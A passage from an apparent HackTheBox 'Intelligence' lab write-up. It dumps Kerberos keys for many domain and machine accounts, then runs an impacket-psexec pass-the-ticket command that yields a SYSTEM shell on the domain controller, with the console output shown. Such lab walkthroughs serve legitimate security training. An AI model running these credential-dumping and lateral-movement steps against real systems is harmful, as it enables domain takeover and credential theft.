intelligence.htb\nicole.brock:aes128-cts-hmac-sha1-96:a61d2b568b9b3535fc21d24975127db3
intelligence.htb\nicole.brock:des-cbc-md5:1554e3702a1954bc
intelligence.htb\stephanie.young:aes256-cts-hmac-sha1-96:ea36d54289dd438b308da64ab3b69a23a644e8f6808530bcda8882881905a8fd
intelligence.htb\stephanie.young:aes128-cts-hmac-sha1-96:018222835d22f07d1c252cd6fa0710eb
intelligence.htb\stephanie.young:des-cbc-md5:461ffd7cfbc8f719
intelligence.htb\john.coleman:aes256-cts-hmac-sha1-96:8067bb73df474595a8bc723f4de2ab0a86fb910d93f0ab6102e3fb63768c8403
intelligence.htb\john.coleman:aes128-cts-hmac-sha1-96:c79cab0353ad47f96ad2535c1532e3b4
intelligence.htb\john.coleman:des-cbc-md5:1a8f61daf88cada4
intelligence.htb\thomas.valenzuela:aes256-cts-hmac-sha1-96:6ece4d420a8b29d9ecbe3cfe8fdd3acb2d5f1ae08df82e793ad381ce9c438519
intelligence.htb\thomas.valenzuela:aes128-cts-hmac-sha1-96:1adc220bb780a27c2e132e6f56b300e1
intelligence.htb\thomas.valenzuela:des-cbc-md5:4a20f2cbc48f4a25
intelligence.htb\thomas.hall:aes256-cts-hmac-sha1-96:42c2083058468fdd87d99f499f1bf28d2e1fe52ca9905749449870350e122538
intelligence.htb\thomas.hall:aes128-cts-hmac-sha1-96:92689a74b9c5049685c1eab8191d1059
intelligence.htb\thomas.hall:des-cbc-md5:c1689415d0b349cd
intelligence.htb\brian.baker:aes256-cts-hmac-sha1-96:af4bde66e34333e9ac6347e990683a204449b35d59d16799890aa7373379a209
intelligence.htb\brian.baker:aes128-cts-hmac-sha1-96:2091fe2a67c3112abf4d86341b08a020
intelligence.htb\brian.baker:des-cbc-md5:20854cb0bf7f08cb
intelligence.htb\richard.williams:aes256-cts-hmac-sha1-96:39d20f1d098b0d11c76d46c796a00e485ccdb75888ab21a5e8ad48d9c43a9f99
intelligence.htb\richard.williams:aes128-cts-hmac-sha1-96:62051aea798dac4b50a7473bdf819357
intelligence.htb\richard.williams:des-cbc-md5:f78554f740a8fd37
intelligence.htb\teresa.williamson:aes256-cts-hmac-sha1-96:953ba46a1f1ab8452af44b430ccfbefd6aa365ce3c8472a6b69703a61ab9f852
intelligence.htb\teresa.williamson:aes128-cts-hmac-sha1-96:dd78207d6785612eb9f82041229b9115
intelligence.htb\teresa.williamson:des-cbc-md5:64e925a40408dae9
intelligence.htb\david.wilson:aes256-cts-hmac-sha1-96:694ece7501043ef160eb03387f6a307821325720c8bacad867f9ecd450728080
intelligence.htb\david.wilson:aes128-cts-hmac-sha1-96:55363f7a6a44fa20d0e5a11194effce9
intelligence.htb\david.wilson:des-cbc-md5:ec16c87f6e23c89b
intelligence.htb\darryl.harris:aes256-cts-hmac-sha1-96:a84f076f19ce91192267337b3d193925f994f1b33da20b39e90da2fba7071bdd
intelligence.htb\darryl.harris:aes128-cts-hmac-sha1-96:e5725af1790497d9674a6b5a3c58994b
intelligence.htb\darryl.harris:des-cbc-md5:0bfe23d3e6d668c4
intelligence.htb\william.lee:aes256-cts-hmac-sha1-96:ad8cf538481b64edf9df94e5fa9db14b2df9dc9bbbb4a505f8d576b30b6068dd
intelligence.htb\william.lee:aes128-cts-hmac-sha1-96:0f468f9c3a56be7173331778c3b61a22
intelligence.htb\william.lee:des-cbc-md5:237083ea75b0a1a2
intelligence.htb\thomas.wise:aes256-cts-hmac-sha1-96:a3a513ffaba7ff91bb4b0c96bea6d891ba8ab7fd45e260c8369d91a01c74b6e7
intelligence.htb\thomas.wise:aes128-cts-hmac-sha1-96:9027d42b650d6f3d98d0d31a713fd6d1
intelligence.htb\thomas.wise:des-cbc-md5:a76de0fba7892ce6
intelligence.htb\veronica.patel:aes256-cts-hmac-sha1-96:c7841eb0f843a15d0868c416e8f02e638400c0b789f861e5f126e41da7f5804d
intelligence.htb\veronica.patel:aes128-cts-hmac-sha1-96:065c8b582be8b0fd944b9db1ed6523ed
intelligence.htb\veronica.patel:des-cbc-md5:73a12af8d954f794
intelligence.htb\joel.crawford:aes256-cts-hmac-sha1-96:ba65147177659d607593ee0d4db39f83eb03d33955d64f690db82db793fbde42
intelligence.htb\joel.crawford:aes128-cts-hmac-sha1-96:7e1bce51c6b4cb73bdff47d0a54e3854
intelligence.htb\joel.crawford:des-cbc-md5:da806716e3a7106d
intelligence.htb\jean.walter:aes256-cts-hmac-sha1-96:97b7305619dba3d3f68f028860831335a6e86617a6a91cb4fad5ce25f7b5103f
intelligence.htb\jean.walter:aes128-cts-hmac-sha1-96:342909445b423a96346d786cf8e0750b
intelligence.htb\jean.walter:des-cbc-md5:f4ecbcb50e92155d
intelligence.htb\anita.roberts:aes256-cts-hmac-sha1-96:e4391edabdb89fe6fb3fe65c291299adbf1e4fd4fed15db38a1033986697a9d0
intelligence.htb\anita.roberts:aes128-cts-hmac-sha1-96:f894501ce29399a462da02f2df2af106
intelligence.htb\anita.roberts:des-cbc-md5:d902c791dfb9a4d3
intelligence.htb\brian.morris:aes256-cts-hmac-sha1-96:d8636a754109f191f067818da6420b3441d95457d1e31df5d9cd05a0eec4b65e
intelligence.htb\brian.morris:aes128-cts-hmac-sha1-96:45a0da625e5283ee353d10d25140f31a
intelligence.htb\brian.morris:des-cbc-md5:df2f2cd5d5e58f6d
intelligence.htb\daniel.shelton:aes256-cts-hmac-sha1-96:00f5f28e941558ba6c1bcc4fb674b50785633510c10b265e56a611f8845f2aba
intelligence.htb\daniel.shelton:aes128-cts-hmac-sha1-96:d14fb2ad083d60ed0ac0b5d12c5bc24d
intelligence.htb\daniel.shelton:des-cbc-md5:8643b991cdf1c146
intelligence.htb\jessica.moody:aes256-cts-hmac-sha1-96:ceec226b171f795b66c965a2e50c22a939d6b36102245c0e01e8d6cc45791e7b
intelligence.htb\jessica.moody:aes128-cts-hmac-sha1-96:2192e448419e2fb019b929e0ad7fbbef
intelligence.htb\jessica.moody:des-cbc-md5:fe9434706d0b674c
intelligence.htb\tiffany.molina:aes256-cts-hmac-sha1-96:fd72395eff4e22dfd26752c2648b6fa45331662abf917fe5b38d5ec578ad2271
intelligence.htb\tiffany.molina:aes128-cts-hmac-sha1-96:eee1655069dc004e3118634907c6a689
intelligence.htb\tiffany.molina:des-cbc-md5:37cde5134acba76b
intelligence.htb\james.curbow:aes256-cts-hmac-sha1-96:aa40673df918aa36bf90bd7a6022f9a223ae2d2c2b54429bf1cb61a152a78ff8
intelligence.htb\james.curbow:aes128-cts-hmac-sha1-96:ee89e49bea0fbc792be16d4d4cf1cf9d
intelligence.htb\james.curbow:des-cbc-md5:f40ea738f76e1397
intelligence.htb\jeremy.mora:aes256-cts-hmac-sha1-96:c66ae8416b999d44c5b1a8cd945bae0d6ea86e7891f1f190c2d1da34b7dc6eaa
intelligence.htb\jeremy.mora:aes128-cts-hmac-sha1-96:757159175f1741317bfce199ec749b00
intelligence.htb\jeremy.mora:des-cbc-md5:a1865bd957797038
intelligence.htb\jason.patterson:aes256-cts-hmac-sha1-96:d2360bcbf255e5226485b07e0a2e66e94bb296a3deac0b8c7ef0419ac9cbbe52
intelligence.htb\jason.patterson:aes128-cts-hmac-sha1-96:4524a326d3ee31b4900576e44bdb52bf
intelligence.htb\jason.patterson:des-cbc-md5:80a7f1b36de0adda
intelligence.htb\laura.lee:aes256-cts-hmac-sha1-96:06edfbbd11c97570ec8d951f7aebeafebc0b507515457a3118d2ff905ec3c00f
intelligence.htb\laura.lee:aes128-cts-hmac-sha1-96:2f6b685dbe4a2ab6dba9caf12cc6dfcd
intelligence.htb\laura.lee:des-cbc-md5:6b25230d340292e6
intelligence.htb\ted.graves:aes256-cts-hmac-sha1-96:6907d00169d3f89abd23c79b51faee5dd59c591c8fec2558f83015fac59d407a
intelligence.htb\ted.graves:aes128-cts-hmac-sha1-96:fb439de8ecc244dcbd303248227bb9d0
intelligence.htb\ted.graves:des-cbc-md5:57bf52aba4f757a1
dc$:aes256-cts-hmac-sha1-96:2694a7ac5aac03d3561b461a13e458ed3100bbee085e1260d4cabdd7cfebe095
dc$:aes128-cts-hmac-sha1-96:ff36c31277c427b27394b771e4c6f570
dc$:des-cbc-md5:c7cb620bbaa8c7d5
svc_int$:aes256-cts-hmac-sha1-96:30844881b57965c3a115cafa00eb0935928ff0af889f3818e0bc1ccf50c0cbfb
svc_int$:aes128-cts-hmac-sha1-96:327f8f8594183dfe4f430986556147b2
svc_int$:des-cbc-md5:9da7fb54732ab90d
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shell Drop

---

┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=administrator.ccache impacket-psexec intelligence.htb/@dc.intelligence.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file yRvvqZpC.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service POIz on dc.intelligence.htb.....
[*] Starting service POIz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
dc
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::23b
   IPv6 Address. . . . . . . . . . . : dead:beef::95e:6ab2:ad09:42c7
   Link-local IPv6 Address . . . . . : fe80::95e:6ab2:ad09:42c7%6
   IPv4 Address. . . . . . . . . . . : 10.10.10.248
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
                                       10.10.10.2

System Level Compromise